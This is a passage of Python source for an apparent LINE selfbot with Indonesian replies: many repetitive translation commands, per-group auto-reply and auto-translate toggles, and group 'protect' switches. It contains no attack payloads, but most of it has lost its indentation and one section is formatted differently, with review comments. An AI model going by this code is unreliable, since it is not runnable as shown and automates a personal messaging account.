translator = Translator()
hasil = translator.translate(isi, dest='nl')
A = hasil.text
aditmadzs.sendMessage(msg.to, A)
elif msg.text.lower().startswith("tr-en "):
if wait["selfbot"] == True:
if msg._from in admin:
sep = text.split(" ")
isi = text.replace(sep[0] + " ","")
translator = Translator()
hasil = translator.translate(isi, dest='en')
A = hasil.text
aditmadzs.sendMessage(msg.to, A)
elif msg.text.lower().startswith("tr-et "):
if wait["selfbot"] == True:
if msg._from in admin:
sep = text.split(" ")
isi = text.replace(sep[0] + " ","")
translator = Translator()
hasil = translator.translate(isi, dest='et')
A = hasil.text
aditmadzs.sendMessage(msg.to, A)
elif msg.text.lower().startswith("tr-fi "):
if wait["selfbot"] == True:
if msg._from in admin:
sep = text.split(" ")
isi = text.replace(sep[0] + " ","")
translator = Translator()
hasil = translator.translate(isi, dest='fi')
A = hasil.text
aditmadzs.sendMessage(msg.to, A)
elif msg.text.lower().startswith("tr-fr "):
if wait["selfbot"] == True:
if msg._from in admin:
sep = text.split(" ")
isi = text.replace(sep[0] + " ","")
translator = Translator()
hasil = translator.translate(isi, dest='fr')
A = hasil.text
aditmadzs.sendMessage(msg.to, A)
elif msg.text.lower().startswith("tr-fy "):
if wait["selfbot"] == True:
if msg._from in admin:
sep = text.split(" ")
isi = text.replace(sep[0] + " ","")
translator = Translator()
hasil = translator.translate(isi, dest='fy')
A = hasil.text
aditmadzs.sendMessage(msg.to, A)
elif msg.text.lower().startswith("tr-gl "):
if wait["selfbot"] == True:
if msg._from in admin:
sep = text.split(" ")
isi = text.replace(sep[0] + " ","")
translator = Translator()
hasil = translator.translate(isi, dest='gl')
A = hasil.text
aditmadzs.sendMessage(msg.to, A)
elif msg.text.lower().startswith("tr-ka "):
if wait["selfbot"] == True:
if msg._from in admin:
sep = text.split(" ")
isi = text.replace(sep[0] + " ","")
translator = Translator()
hasil = translator.translate(isi, dest='ka')
A = hasil.text
aditmadzs.sendMessage(msg.to, A)
elif msg.text.lower().startswith("tr-de "):
if wait["selfbot"] == True:
if msg._from in admin:
sep = text.split(" ")
isi = text.replace(sep[0] + " ","")
translator = Translator()
hasil = translator.translate(isi, dest='de')
A = hasil.text
aditmadzs.sendMessage(msg.to, A)
elif msg.text.lower().startswith("tr-el "):
if wait["selfbot"] == True:
if msg._from in admin:
sep = text.split(" ")
isi = text.replace(sep[0] + " ","")
translator = Translator()
hasil = translator.translate(isi, dest='el')
A = hasil.text
aditmadzs.sendMessage(msg.to, A)
elif msg.text.lower().startswith("tr-gu "):
if wait["selfbot"] == True:
if msg._from in admin:
sep = text.split(" ")
isi = text.replace(sep[0] + " ","")
translator = Translator()
hasil = translator.translate(isi, dest='gu')
A = hasil.text
aditmadzs.sendMessage(msg.to, A)
elif msg.text.lower().startswith("tr-ht "):
if wait["selfbot"] == True:
if msg._from in admin:
sep = text.split(" ")
isi = text.replace(sep[0] + " ","")
translator = Translator()
hasil = translator.translate(isi, dest='ht')
A = hasil.text
aditmadzs.sendMessage(msg.to, A)
elif msg.text.lower().startswith("tr-ha "):
if wait["selfbot"] == True:
if msg._from in admin:
sep = text.split(" ")
isi = text.replace(sep[0] + " ","")
translator = Translator()
hasil = translator.translate(isi, dest='ha')
A = hasil.text
aditmadzs.sendMessage(msg.to, A)
elif msg.text.lower().startswith("tr-haw "):
if wait["selfbot"] == True:
if msg._from in admin:
sep = text.split(" ")
isi = text.replace(sep[0] + " ","")
translator = Translator()
hasil = translator.translate(isi, dest='haw')
A = hasil.text
aditmadzs.sendMessage(msg.to, A)
elif msg.text.lower().startswith("tr-iw "):
if wait["selfbot"] == True:
if msg._from in admin:
sep = text.split(" ")
isi = text.replace(sep[0] + " ","")
translator = Translator()
hasil = translator.translate(isi, dest='iw')
A = hasil.text
aditmadzs.sendMessage(msg.to, A)
elif msg.text.lower().startswith("tr-hi "):
if wait["selfbot"] == True:
if msg._from in admin:
sep = text.split(" ")
isi = text.replace(sep[0] + " ","")
translator = Translator()
hasil = translator.translate(isi, dest='hi')
A = hasil.text
aditmadzs.sendMessage(msg.to, A)
elif msg.text.lower().startswith("tr-hmn "):
if wait["selfbot"] == True:
if msg._from in admin:
sep = text.split(" ")
isi = text.replace(sep[0] + " ","")
translator = Translator()
hasil = translator.translate(isi, dest='hmn')
A = hasil.text
aditmadzs.sendMessage(msg.to, A)
elif msg.text.lower().startswith("tr-hu "):
if wait["selfbot"] == True:
if msg._from in admin:
sep = text.split(" ")
isi = text.replace(sep[0] + " ","")
translator = Translator()
hasil = translator.translate(isi, dest='hu')
A = hasil.text
aditmadzs.sendMessage(msg.to, A)
elif msg.text.lower().startswith("tr-is "):
if wait["selfbot"] == True:
if msg._from in admin:
sep = text.split(" ")
isi = text.replace(sep[0] + " ","")
translator = Translator()
hasil = translator.translate(isi, dest='is')
A = hasil.text
aditmadzs.sendMessage(msg.to, A)
elif msg.text.lower().startswith("tr-ig "):
if wait["selfbot"] == True:
if msg._from in admin:
sep = text.split(" ")
isi = text.replace(sep[0] + " ","")
translator = Translator()
hasil = translator.translate(isi, dest='ig')
A = hasil.text
aditmadzs.sendMessage(msg.to, A)
elif msg.text.lower().startswith("tr-id "):
if wait["selfbot"] == True:
if msg._from in admin:
sep = text.split(" ")
isi = text.replace(sep[0] + " ","")
translator = Translator()
hasil = translator.translate(isi, dest='id')
A = hasil.text
aditmadzs.sendMessage(msg.to, A)
elif msg.text.lower().startswith("tr-ga "):
if wait["selfbot"] == True:
if msg._from in admin:
sep = text.split(" ")
isi = text.replace(sep[0] + " ","")
translator = Translator()
hasil = translator.translate(isi, dest='ga')
A = hasil.text
aditmadzs.sendMessage(msg.to, A)
elif msg.text.lower().startswith("tr-it "):
if wait["selfbot"] == True:
if msg._from in admin:
sep = text.split(" ")
isi = text.replace(sep[0] + " ","")
translator = Translator()
hasil = translator.translate(isi, dest='it')
A = hasil.text
aditmadzs.sendMessage(msg.to, A)
elif msg.text.lower().startswith("tr-ja "):
if wait["selfbot"] == True:
if msg._from in admin:
sep = text.split(" ")
isi = text.replace(sep[0] + " ","")
translator = Translator()
hasil = translator.translate(isi, dest='ja')
A = hasil.text
aditmadzs.sendMessage(msg.to, A)
elif msg.text.lower().startswith("tr-jw "):
if wait["selfbot"] == True:
if msg._from in admin:
sep = text.split(" ")
isi = text.replace(sep[0] + " ","")
translator = Translator()
hasil = translator.translate(isi, dest='jw')
A = hasil.text
aditmadzs.sendMessage(msg.to, A)
elif msg.text.lower().startswith("tr-kn "):
if wait["selfbot"] == True:
if msg._from in admin:
sep = text.split(" ")
isi = text.replace(sep[0] + " ","")
translator = Translator()
hasil = translator.translate(isi, dest='kn')
A = hasil.text
aditmadzs.sendMessage(msg.to, A)
elif msg.text.lower().startswith("tr-kk "):
if wait["selfbot"] == True:
if msg._from in admin:
sep = text.split(" ")
isi = text.replace(sep[0] + " ","")
translator = Translator()
hasil = translator.translate(isi, dest='kk')
A = hasil.text
aditmadzs.sendMessage(msg.to, A)
elif msg.text.lower().startswith("tr-km "):
if wait["selfbot"] == True:
if msg._from in admin:
sep = text.split(" ")
isi = text.replace(sep[0] + " ","")
translator = Translator()
hasil = translator.translate(isi, dest='km')
A = hasil.text
aditmadzs.sendMessage(msg.to, A)
elif msg.text.lower().startswith("tr-ko "):
if wait["selfbot"] == True:
if msg._from in admin:
sep = text.split(" ")
isi = text.replace(sep[0] + " ","")
translator = Translator()
hasil = translator.translate(isi, dest='ko')
A = hasil.text
aditmadzs.sendMessage(msg.to, A)
elif msg.text.lower().startswith("tr-ku "):
if wait["selfbot"] == True:
if msg._from in admin:
sep = text.split(" ")
isi = text.replace(sep[0] + " ","")
translator = Translator()
hasil = translator.translate(isi, dest='ku')
A = hasil.text
aditmadzs.sendMessage(msg.to, A)
elif msg.text.lower().startswith("tr-ky "):
if wait["selfbot"] == True:
if msg._from in admin:
sep = text.split(" ")
isi = text.replace(sep[0] + " ","")
translator = Translator()
hasil = translator.translate(isi, dest='ky')
A = hasil.text
aditmadzs.sendMessage(msg.to, A)
elif msg.text.lower().startswith("tr-lo "):
if wait["selfbot"] == True:
if msg._from in admin:
sep = text.split(" ")
isi = text.replace(sep[0] + " ","")
translator = Translator()
hasil = translator.translate(isi, dest='lo')
A = hasil.text
aditmadzs.sendMessage(msg.to, A)
elif msg.text.lower().startswith("tr-la "):
if wait["selfbot"] == True:
if msg._from in admin:
sep = text.split(" ")
isi = text.replace(sep[0] + " ","")
translator = Translator()
hasil = translator.translate(isi, dest='la')
A = hasil.text
aditmadzs.sendMessage(msg.to, A)
elif msg.text.lower().startswith("tr-lv "):
if wait["selfbot"] == True:
if msg._from in admin:
sep = text.split(" ")
isi = text.replace(sep[0] + " ","")
translator = Translator()
hasil = translator.translate(isi, dest='lv')
A = hasil.text
aditmadzs.sendMessage(msg.to, A)
elif msg.text.lower().startswith("tr-lt "):
if wait["selfbot"] == True:
if msg._from in admin:
sep = text.split(" ")
isi = text.replace(sep[0] + " ","")
translator = Translator()
hasil = translator.translate(isi, dest='lt')
A = hasil.text
aditmadzs.sendMessage(msg.to, A)
elif msg.text.lower().startswith("tr-lb "):
if wait["selfbot"] == True:
if msg._from in admin:
sep = text.split(" ")
isi = text.replace(sep[0] + " ","")
translator = Translator()
hasil = translator.translate(isi, dest='lb')
A = hasil.text
aditmadzs.sendMessage(msg.to, A)
elif msg.text.lower().startswith("tr-mk "):
if wait["selfbot"] == True:
if msg._from in admin:
sep = text.split(" ")
isi = text.replace(sep[0] + " ","")
translator = Translator()
hasil = translator.translate(isi, dest='mk')
A = hasil.text
aditmadzs.sendMessage(msg.to, A)
elif msg.text.lower().startswith("tr-mg "):
if wait["selfbot"] == True:
if msg._from in admin:
sep = text.split(" ")
isi = text.replace(sep[0] + " ","")
translator = Translator()
hasil = translator.translate(isi, dest='mg')
A = hasil.text
aditmadzs.sendMessage(msg.to, A)
elif msg.text.lower().startswith("tr-ms "):
if wait["selfbot"] == True:
if msg._from in admin:
sep = text.split(" ")
isi = text.replace(sep[0] + " ","")
translator = Translator()
hasil = translator.translate(isi, dest='ms')
A = hasil.text
aditmadzs.sendMessage(msg.to, A)
elif msg.text.lower().startswith("tr-ml "):
if wait["selfbot"] == True:
if msg._from in admin:
sep = text.split(" ")
isi = text.replace(sep[0] + " ","")
translator = Translator()
hasil = translator.translate(isi, dest='ml')
A = hasil.text
aditmadzs.sendMessage(msg.to, A)
elif msg.text.lower().startswith("tr-mt "):
if wait["selfbot"] == True:
if msg._from in admin:
sep = text.split(" ")
isi = text.replace(sep[0] + " ","")
translator = Translator()
hasil = translator.translate(isi, dest='mt')
A = hasil.text
aditmadzs.sendMessage(msg.to, A)
elif msg.text.lower().startswith("tr-mi "):
if wait["selfbot"] == True:
if msg._from in admin:
sep = text.split(" ")
isi = text.replace(sep[0] + " ","")
translator = Translator()
hasil = translator.translate(isi, dest='mi')
A = hasil.text
aditmadzs.sendMessage(msg.to, A)
elif msg.text.lower().startswith("tr-mr "):
if wait["selfbot"] == True:
if msg._from in admin:
sep = text.split(" ")
isi = text.replace(sep[0] + " ","")
translator = Translator()
hasil = translator.translate(isi, dest='mr')
A = hasil.text
aditmadzs.sendMessage(msg.to, A)
elif msg.text.lower().startswith("tr-mn "):
if wait["selfbot"] == True:
if msg._from in admin:
sep = text.split(" ")
isi = text.replace(sep[0] + " ","")
translator = Translator()
hasil = translator.translate(isi, dest='mn')
A = hasil.text
aditmadzs.sendMessage(msg.to, A)
elif msg.text.lower().startswith("tr-my "):
if wait["selfbot"] == True:
if msg._from in admin:
sep = text.split(" ")
isi = text.replace(sep[0] + " ","")
translator = Translator()
hasil = translator.translate(isi, dest='my')
A = hasil.text
aditmadzs.sendMessage(msg.to, A)
elif msg.text.lower().startswith("tr-ne "):
if wait["selfbot"] == True:
if msg._from in admin:
sep = text.split(" ")
isi = text.replace(sep[0] + " ","")
translator = Translator()
hasil = translator.translate(isi, dest='ne')
A = hasil.text
aditmadzs.sendMessage(msg.to, A)
elif msg.text.lower().startswith("tr-no "):
if wait["selfbot"] == True:
if msg._from in admin:
sep = text.split(" ")
isi = text.replace(sep[0] + " ","")
translator = Translator()
hasil = translator.translate(isi, dest='no')
A = hasil.text
aditmadzs.sendMessage(msg.to, A)
elif msg.text.lower().startswith("tr-ps "):
if wait["selfbot"] == True:
if msg._from in admin:
sep = text.split(" ")
isi = text.replace(sep[0] + " ","")
translator = Translator()
hasil = translator.translate(isi, dest='ps')
A = hasil.text
aditmadzs.sendMessage(msg.to, A)
elif msg.text.lower().startswith("tr-fa "):
if wait["selfbot"] == True:
if msg._from in admin:
sep = text.split(" ")
isi = text.replace(sep[0] + " ","")
translator = Translator()
hasil = translator.translate(isi, dest='fa')
A = hasil.text
aditmadzs.sendMessage(msg.to, A)
elif msg.text.lower().startswith("tr-pl "):
if wait["selfbot"] == True:
if msg._from in admin:
sep = text.split(" ")
isi = text.replace(sep[0] + " ","")
translator = Translator()
hasil = translator.translate(isi, dest='pl')
A = hasil.text
aditmadzs.sendMessage(msg.to, A)
elif msg.text.lower().startswith("tr-pt "):
if wait["selfbot"] == True:
if msg._from in admin:
sep = text.split(" ")
isi = text.replace(sep[0] + " ","")
translator = Translator()
hasil = translator.translate(isi, dest='pt')
A = hasil.text
aditmadzs.sendMessage(msg.to, A)
elif msg.text.lower().startswith("tr-pa "):
if wait["selfbot"] == True:
if msg._from in admin:
sep = text.split(" ")
isi = text.replace(sep[0] + " ","")
translator = Translator()
hasil = translator.translate(isi, dest='pa')
A = hasil.text
aditmadzs.sendMessage(msg.to, A)
elif msg.text.lower().startswith("tr-ro "):
if wait["selfbot"] == True:
if msg._from in admin:
sep = text.split(" ")
isi = text.replace(sep[0] + " ","")
translator = Translator()
hasil = translator.translate(isi, dest='ro')
A = hasil.text
aditmadzs.sendMessage(msg.to, A)
elif msg.text.lower().startswith("tr-ru "):
if wait["selfbot"] == True:
if msg._from in admin:
sep = text.split(" ")
isi = text.replace(sep[0] + " ","")
translator = Translator()
hasil = translator.translate(isi, dest='ru')
A = hasil.text
aditmadzs.sendMessage(msg.to, A)
elif msg.text.lower().startswith("tr-sm "):
if wait["selfbot"] == True:
if msg._from in admin:
sep = text.split(" ")
isi = text.replace(sep[0] + " ","")
translator = Translator()
hasil = translator.translate(isi, dest='sm')
A = hasil.text
aditmadzs.sendMessage(msg.to, A)
elif msg.text.lower().startswith("tr-gd "):
if wait["selfbot"] == True:
if msg._from in admin:
sep = text.split(" ")
isi = text.replace(sep[0] + " ","")
translator = Translator()
hasil = translator.translate(isi, dest='gd')
A = hasil.text
aditmadzs.sendMessage(msg.to, A)
elif msg.text.lower().startswith("tr-sr "):
if wait["selfbot"] == True:
if msg._from in admin:
sep = text.split(" ")
isi = text.replace(sep[0] + " ","")
translator = Translator()
hasil = translator.translate(isi, dest='sr')
A = hasil.text
aditmadzs.sendMessage(msg.to, A)
elif msg.text.lower().startswith("tr-st "):
if wait["selfbot"] == True:
if msg._from in admin:
sep = text.split(" ")
isi = text.replace(sep[0] + " ","")
translator = Translator()
hasil = translator.translate(isi, dest='st')
A = hasil.text
aditmadzs.sendMessage(msg.to, A)
elif msg.text.lower().startswith("tr-sn "):
if wait["selfbot"] == True:
if msg._from in admin:
sep = text.split(" ")
isi = text.replace(sep[0] + " ","")
translator = Translator()
hasil = translator.translate(isi, dest='sn')
A = hasil.text
aditmadzs.sendMessage(msg.to, A)
elif msg.text.lower().startswith("tr-sd "):
if wait["selfbot"] == True:
if msg._from in admin:
sep = text.split(" ")
isi = text.replace(sep[0] + " ","")
translator = Translator()
hasil = translator.translate(isi, dest='sd')
A = hasil.text
aditmadzs.sendMessage(msg.to, A)
elif msg.text.lower().startswith("tr-si "):
if wait["selfbot"] == True:
if msg._from in admin:
sep = text.split(" ")
isi = text.replace(sep[0] + " ","")
translator = Translator()
hasil = translator.translate(isi, dest='si')
A = hasil.text
aditmadzs.sendMessage(msg.to, A)
elif msg.text.lower().startswith("tr-sk "):
if wait["selfbot"] == True:
if msg._from in admin:
sep = text.split(" ")
isi = text.replace(sep[0] + " ","")
translator = Translator()
hasil = translator.translate(isi, dest='sk')
A = hasil.text
aditmadzs.sendMessage(msg.to, A)
elif msg.text.lower().startswith("tr-sl "):
if wait["selfbot"] == True:
if msg._from in admin:
sep = text.split(" ")
isi = text.replace(sep[0] + " ","")
translator = Translator()
hasil = translator.translate(isi, dest='sl')
A = hasil.text
aditmadzs.sendMessage(msg.to, A)
elif msg.text.lower().startswith("tr-so "):
if wait["selfbot"] == True:
if msg._from in admin:
sep = text.split(" ")
isi = text.replace(sep[0] + " ","")
translator = Translator()
hasil = translator.translate(isi, dest='so')
A = hasil.text
aditmadzs.sendMessage(msg.to, A)
elif msg.text.lower().startswith("tr-es "):
if wait["selfbot"] == True:
if msg._from in admin:
sep = text.split(" ")
isi = text.replace(sep[0] + " ","")
translator = Translator()
hasil = translator.translate(isi, dest='es')
A = hasil.text
aditmadzs.sendMessage(msg.to, A)
elif msg.text.lower().startswith("tr-su "):
if wait["selfbot"] == True:
if msg._from in admin:
sep = text.split(" ")
isi = text.replace(sep[0] + " ","")
translator = Translator()
hasil = translator.translate(isi, dest='su')
A = hasil.text
aditmadzs.sendMessage(msg.to, A)
elif msg.text.lower().startswith("tr-sw "):
if wait["selfbot"] == True:
if msg._from in admin:
sep = text.split(" ")
isi = text.replace(sep[0] + " ","")
translator = Translator()
hasil = translator.translate(isi, dest='sw')
A = hasil.text
aditmadzs.sendMessage(msg.to, A)
elif msg.text.lower().startswith("tr-sv "):
if wait["selfbot"] == True:
if msg._from in admin:
sep = text.split(" ")
isi = text.replace(sep[0] + " ","")
translator = Translator()
hasil = translator.translate(isi, dest='sv')
A = hasil.text
aditmadzs.sendMessage(msg.to, A)
elif msg.text.lower().startswith("tr-tg "):
if wait["selfbot"] == True:
if msg._from in admin:
sep = text.split(" ")
isi = text.replace(sep[0] + " ","")
translator = Translator()
hasil = translator.translate(isi, dest='tg')
A = hasil.text
aditmadzs.sendMessage(msg.to, A)
elif msg.text.lower().startswith("tr-ta "):
if wait["selfbot"] == True:
if msg._from in admin:
sep = text.split(" ")
isi = text.replace(sep[0] + " ","")
translator = Translator()
hasil = translator.translate(isi, dest='ta')
A = hasil.text
aditmadzs.sendMessage(msg.to, A)
elif msg.text.lower().startswith("tr-te "):
if wait["selfbot"] == True:
if msg._from in admin:
sep = text.split(" ")
isi = text.replace(sep[0] + " ","")
translator = Translator()
hasil = translator.translate(isi, dest='te')
A = hasil.text
aditmadzs.sendMessage(msg.to, A)
elif msg.text.lower().startswith("tr-th "):
if wait["selfbot"] == True:
if msg._from in admin:
sep = text.split(" ")
isi = text.replace(sep[0] + " ","")
translator = Translator()
hasil = translator.translate(isi, dest='th')
A = hasil.text
aditmadzs.sendMessage(msg.to, A)
elif msg.text.lower().startswith("tr-tr "):
if wait["selfbot"] == True:
if msg._from in admin:
sep = text.split(" ")
isi = text.replace(sep[0] + " ","")
translator = Translator()
hasil = translator.translate(isi, dest='tr')
A = hasil.text
aditmadzs.sendMessage(msg.to, A)
elif msg.text.lower().startswith("tr-uk "):
if wait["selfbot"] == True:
if msg._from in admin:
sep = text.split(" ")
isi = text.replace(sep[0] + " ","")
translator = Translator()
hasil = translator.translate(isi, dest='uk')
A = hasil.text
aditmadzs.sendMessage(msg.to, A)
elif msg.text.lower().startswith("tr-ur "):
if wait["selfbot"] == True:
if msg._from in admin:
sep = text.split(" ")
isi = text.replace(sep[0] + " ","")
translator = Translator()
hasil = translator.translate(isi, dest='ur')
A = hasil.text
aditmadzs.sendMessage(msg.to, A)
elif msg.text.lower().startswith("tr-uz "):
if wait["selfbot"] == True:
if msg._from in admin:
sep = text.split(" ")
isi = text.replace(sep[0] + " ","")
translator = Translator()
hasil = translator.translate(isi, dest='uz')
A = hasil.text
aditmadzs.sendMessage(msg.to, A)
elif msg.text.lower().startswith("tr-vi "):
if wait["selfbot"] == True:
if msg._from in admin:
sep = text.split(" ")
isi = text.replace(sep[0] + " ","")
translator = Translator()
hasil = translator.translate(isi, dest='vi')
A = hasil.text
aditmadzs.sendMessage(msg.to, A)
elif msg.text.lower().startswith("tr-cy "):
if wait["selfbot"] == True:
if msg._from in admin:
sep = text.split(" ")
isi = text.replace(sep[0] + " ","")
translator = Translator()
hasil = translator.translate(isi, dest='cy')
A = hasil.text
aditmadzs.sendMessage(msg.to, A)
elif msg.text.lower().startswith("tr-xh "):
if wait["selfbot"] == True:
if msg._from in admin:
sep = text.split(" ")
isi = text.replace(sep[0] + " ","")
translator = Translator()
hasil = translator.translate(isi, dest='xh')
A = hasil.text
aditmadzs.sendMessage(msg.to, A)
elif msg.text.lower().startswith("tr-yi "):
if wait["selfbot"] == True:
if msg._from in admin:
sep = text.split(" ")
isi = text.replace(sep[0] + " ","")
translator = Translator()
hasil = translator.translate(isi, dest='yi')
A = hasil.text
aditmadzs.sendMessage(msg.to, A)
elif msg.text.lower().startswith("tr-yo "):
if wait["selfbot"] == True:
if msg._from in admin:
sep = text.split(" ")
isi = text.replace(sep[0] + " ","")
translator = Translator()
hasil = translator.translate(isi, dest='yo')
A = hasil.text
aditmadzs.sendMessage(msg.to, A)
elif msg.text.lower().startswith("tr-zu "):
if wait["selfbot"] == True:
if msg._from in admin:
sep = text.split(" ")
isi = text.replace(sep[0] + " ","")
translator = Translator()
hasil = translator.translate(isi, dest='zu')
A = hasil.text
aditmadzs.sendMessage(msg.to, A)
elif msg.text.lower().startswith("tr-fil "):
if wait["selfbot"] == True:
if msg._from in admin:
sep = text.split(" ")
isi = text.replace(sep[0] + " ","")
translator = Translator()
hasil = translator.translate(isi, dest='fil')
A = hasil.text
aditmadzs.sendMessage(msg.to, A)
elif msg.text.lower().startswith("tr-he "):
if wait["selfbot"] == True:
if msg._from in admin:
sep = text.split(" ")
isi = text.replace(sep[0] + " ","")
translator = Translator()
hasil = translator.translate(isi, dest='he')
A = hasil.text
aditmadzs.sendMessage(msg.to, A)
#===========Ayarlar============#
# --- "Simi on/off": toggle simi-simi auto-reply for this chat --------------
# NOTE(review): unlike neighboring commands this has no admin check —
# confirm whether that is intentional.
elif 'Simi ' in msg.text:
    spl = msg.text.replace('Simi ','')
    if spl == 'on':
        if msg.to in simisimi:
            msgs = "Simi-simi sudah aktif"
        else:
            simisimi.append(msg.to)
            ginfo = ki.getGroup(msg.to)
            msgs = "Simi-simi Diaktifkan\nDi Group : " +str(ginfo.name)
        ki.sendMessage(msg.to, "「Diaktifkan」\n" + msgs)
    elif spl == 'off':
        if msg.to in simisimi:
            simisimi.remove(msg.to)
            ginfo = ki.getGroup(msg.to)
            msgs = "Simi-simi Dinonaktifkan\nDi Group : " +str(ginfo.name)
        else:
            msgs = "Simi-simi Sudah Tidak Aktif"
        ki.sendMessage(msg.to, "「Dinonaktifkan」\n" + msgs)
# --- "Autotrans <lang>-on/off": toggle per-chat auto-translation -----------
# Each target language keeps its own membership list (translateth, ...).
elif 'Autotrans th-' in msg.text:
    spl = msg.text.replace('Autotrans th-','')
    if spl == 'on':
        if msg.to in translateth:
            msgs = "Auto Translate sudah aktif"
        else:
            translateth.append(msg.to)
            ginfo = ki.getGroup(msg.to)
            msgs = "Auto Translate Diaktifkan\nDi Group : " +str(ginfo.name)
        ki.sendMessage(msg.to, "「Diaktifkan」\n" + msgs)
    elif spl == 'off':
        if msg.to in translateth:
            translateth.remove(msg.to)
            ginfo = ki.getGroup(msg.to)
            msgs = "Auto Translate Dinonaktifkan\nDi Group : " +str(ginfo.name)
        else:
            msgs = "Auto Translate Sudah Tidak Aktif"
        ki.sendMessage(msg.to, "「Dinonaktifkan」\n" + msgs)
elif 'Autotrans en-' in msg.text:
    spl = msg.text.replace('Autotrans en-','')
    if spl == 'on':
        if msg.to in translateen:
            msgs = "Auto Translate sudah aktif"
        else:
            translateen.append(msg.to)
            ginfo = ki.getGroup(msg.to)
            msgs = "Auto Translate Diaktifkan\nDi Group : " +str(ginfo.name)
        ki.sendMessage(msg.to, "「Diaktifkan」\n" + msgs)
    elif spl == 'off':
        if msg.to in translateen:
            translateen.remove(msg.to)
            ginfo = ki.getGroup(msg.to)
            msgs = "Auto Translate Dinonaktifkan\nDi Group : " +str(ginfo.name)
        else:
            msgs = "Auto Translate Sudah Tidak Aktif"
        ki.sendMessage(msg.to, "「Dinonaktifkan」\n" + msgs)
elif 'Autotrans id-' in msg.text:
    spl = msg.text.replace('Autotrans id-','')
    if spl == 'on':
        if msg.to in translateid:
            msgs = "Auto Translate sudah aktif"
        else:
            translateid.append(msg.to)
            ginfo = ki.getGroup(msg.to)
            msgs = "Auto Translate Diaktifkan\nDi Group : " +str(ginfo.name)
        ki.sendMessage(msg.to, "「Diaktifkan」\n" + msgs)
    elif spl == 'off':
        if msg.to in translateid:
            translateid.remove(msg.to)
            ginfo = ki.getGroup(msg.to)
            msgs = "Auto Translate Dinonaktifkan\nDi Group : " +str(ginfo.name)
        else:
            msgs = "Auto Translate Sudah Tidak Aktif"
        ki.sendMessage(msg.to, "「Dinonaktifkan」\n" + msgs)
elif 'Autotrans tw-' in msg.text:
    spl = msg.text.replace('Autotrans tw-','')
    if spl == 'on':
        if msg.to in translatetw:
            msgs = "Auto Translate sudah aktif"
        else:
            translatetw.append(msg.to)
            ginfo = ki.getGroup(msg.to)
            msgs = "Auto Translate Diaktifkan\nDi Group : " +str(ginfo.name)
        ki.sendMessage(msg.to, "「Diaktifkan」\n" + msgs)
    elif spl == 'off':
        if msg.to in translatetw:
            translatetw.remove(msg.to)
            ginfo = ki.getGroup(msg.to)
            msgs = "Auto Translate Dinonaktifkan\nDi Group : " +str(ginfo.name)
        else:
            msgs = "Auto Translate Sudah Tidak Aktif"
        ki.sendMessage(msg.to, "「Dinonaktifkan」\n" + msgs)
elif 'Autotrans ar-' in msg.text:
    spl = msg.text.replace('Autotrans ar-','')
    if spl == 'on':
        if msg.to in translatear:
            msgs = "Auto Translate sudah aktif"
        else:
            translatear.append(msg.to)
            ginfo = ki.getGroup(msg.to)
            msgs = "Auto Translate Diaktifkan\nDi Group : " +str(ginfo.name)
        ki.sendMessage(msg.to, "「Diaktifkan」\n" + msgs)
    elif spl == 'off':
        if msg.to in translatear:
            translatear.remove(msg.to)
            ginfo = ki.getGroup(msg.to)
            msgs = "Auto Translate Dinonaktifkan\nDi Group : " +str(ginfo.name)
        else:
            msgs = "Auto Translate Sudah Tidak Aktif"
        ki.sendMessage(msg.to, "「Dinonaktifkan」\n" + msgs)
# --- "Welcome on/off": toggle the greeting message for this group ----------
elif 'Welcome ' in msg.text:
    if msg._from in admin:
        spl = msg.text.replace('Welcome ','')
        if spl == 'on':
            if msg.to in welcome:
                msgs = "Welcome Msg sudah aktif"
            else:
                welcome.append(msg.to)
                ginfo = aditmadzs.getGroup(msg.to)
                msgs = "Welcome Msg diaktifkan\nDi Group : " +str(ginfo.name)
            aditmadzs.sendMessage(msg.to, "「Diaktifkan」\n" + msgs)
        elif spl == 'off':
            if msg.to in welcome:
                welcome.remove(msg.to)
                ginfo = aditmadzs.getGroup(msg.to)
                msgs = "Welcome Msg dinonaktifkan\nDi Group : " +str(ginfo.name)
            else:
                msgs = "Welcome Msg sudah tidak aktif"
            aditmadzs.sendMessage(msg.to, "「Dinonaktifkan」\n" + msgs)
#===========Koruma============#
elif 'Protecturl ' in msg.text:
if msg._from in admin:
spl = msg.text.replace('Protecturl ','')
if spl == 'on':
if msg.to in protectqr:
msgs = "Protect url sudah aktif"
else:
protectqr.append(msg.to)
ginfo = aditmadzs.getGroup(msg.to)
msgs = "Protect url diaktifkan\nDi Group : " +str(ginfo.name)
aditmadzs.sendMessage(msg.to, "「Diaktifkan」\n" + msgs)
elif spl == 'off':
if msg.to in protectqr:
protectqr.remove(msg.to)
ginfo = aditmadzs.getGroup(msg.to)
msgs = "Protect url dinonaktifkan\nDi Group : " +str(ginfo.name)
else:
msgs = "Protect url sudah tidak aktif"
aditmadzs.sendMessage(msg.to, "「Dinonaktifkan」\n" + msgs)
elif 'Protectkick ' in msg.text:
if msg._from in admin:
spl = msg.text.replace('Protectkick ','')
if spl == 'on':
if msg.to in protectkick:
msgs = "Protect kick sudah aktif"
else:
protectkick.append(msg.to)
ginfo = aditmadzs.getGroup(msg.to)
msgs = "Protect kick diaktifkan\nDi Group : " +str(ginfo.name)
aditmadzs.sendMessage(msg.to, "「Diaktifkan」\n" + msgs)
elif spl == 'off':
if msg.to in protectkick:
protectkick.remove(msg.to)
ginfo = aditmadzs.getGroup(msg.to)
msgs = "Protect kick dinonaktifkan\nDi Group : " +str(ginfo.name)
else:
msgs = "Protect kick sudah tidak aktif"
aditmadzs.sendMessage(msg.to, "「Dinonaktifkan」\n" + msgs)
elif 'Protectjoin ' in msg.text:
if msg._from in admin:
spl = msg.text.replace('Protectjoin ','')
if spl == 'on':
if msg.to in protectjoin:
msgs = "Protect join sudah aktif"
else:
protectjoin.append(msg.to)
ginfo = aditmadzs.getGroup(msg.to)
msgs = "Protect join diaktifkan\nDi Group : " +str(ginfo.name)
aditmadzs.sendMessage(msg.to, "「Diaktifkan」\n" + msgs)
elif spl == 'off':
if msg.to in protectjoin:
protectjoin.remove(msg.to)
ginfo = aditmadzs.getGroup(msg.to)
msgs = "Protect join dinonaktifkan\nDi Group : " +str(ginfo.name)
else:
msgs = "Protect join sudah tidak aktif"
aditmadzs.sendMessage(msg.to, "「Dinonaktifkan」\n" + msgs)
elif 'Protectcancel ' in msg.text:
if msg._from in admin:
spl = msg.text.replace('Protectcancel ','')
if spl == 'on':
if msg.to in protectcancel:
msgs = "Protect cancel sudah aktif"
else:
protectcancel.append(msg.to)
ginfo = aditmadzs.getGroup(msg.to)
msgs = "Protect cancel diaktifkan\nDi Group : " +str(ginfo.name)
